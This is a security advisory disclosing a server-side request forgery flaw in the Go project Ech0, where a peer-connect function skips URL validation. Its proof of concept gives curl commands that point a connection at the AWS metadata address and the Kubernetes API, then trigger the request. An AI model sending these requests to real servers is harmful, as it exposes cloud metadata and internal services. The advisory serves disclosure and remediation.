PT-2026-41599 · Go · Github.Com/Lin-Snow/Ech0

Publicado

2026-05-07

·

Atualizado

2026-05-07

CVSS v3.1

7.7

Alta

VetorAV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

Summary

The fetchPeerConnectInfo function in internal/service/connect/connect.go:214-239 uses httpUtil.SendRequest (no SSRF protection) instead of SendSafeRequest (which has ValidatePublicHTTPURL with private IP blocking). This allows authenticated users to make the server request arbitrary URLs including internal/cloud metadata endpoints.

Details

In internal/service/connect/connect.go, the fetchPeerConnectInfo function:
go
func fetchPeerConnectInfo(peerConnectURL string, requestTimeout time.Duration) (model.Connect, error) {
  url := httpUtil.TrimURL(peerConnectURL) + "/api/connect"
  resp, err := httpUtil.SendRequest(url, "GET", struct {...}{...}, requestTimeout)
This uses SendRequest which has NO URL validation. The codebase HAS SendSafeRequest at internal/util/http/http.go:228-281 with proper SSRF protection, but fetchPeerConnectInfo does not use it.
Called from:
  • Line 307: data, err := fetchPeerConnectInfo(conn.ConnectURL, requestTimeout)
    • Line 498: data, err := fetchPeerConnectInfo(conn.ConnectURL, healthProbeTimeout)

PoC

bash
# 1. Add a connection pointing to AWS metadata service
curl -X POST "https://ech0.example.com/api/connects" 
 -H "Authorization: Bearer <token>" 
 -d '{"connect url": "http://169.254.169.254/latest/meta-data/instance-id"}'

# 2. Trigger SSRF via health check
curl -H "Authorization: Bearer <token>" 
 "https://ech0.example.com/api/connects/health"
# Returns AWS EC2 instance ID
Or for Kubernetes:
bash
curl -X POST "https://ech0.example.com/api/connects" 
 -H "Authorization: Bearer <token>" 
 -d '{"connect url": "http://kubernetes.default.svc.cluster.local:443/api"}'

Impact

  • Confidentiality: SSRF can access internal services, cloud metadata (AWS IMDSv1, GCE metadata), Kubernetes API
    • CWE-918: Server-Side Request Forgery

Correção

SSRF

Encontrou algum problema na descrição? Tem algo a acrescentar? Fique à vontade para nos escrever 👾
dbugs@ptsecurity.com

Enumeração de Fraquezas

CWE-918

Identificadores relacionados

GHSA-8MC6-XJPR-H98X

Produtos afetados

Github.Com/Lin-Snow/Ech0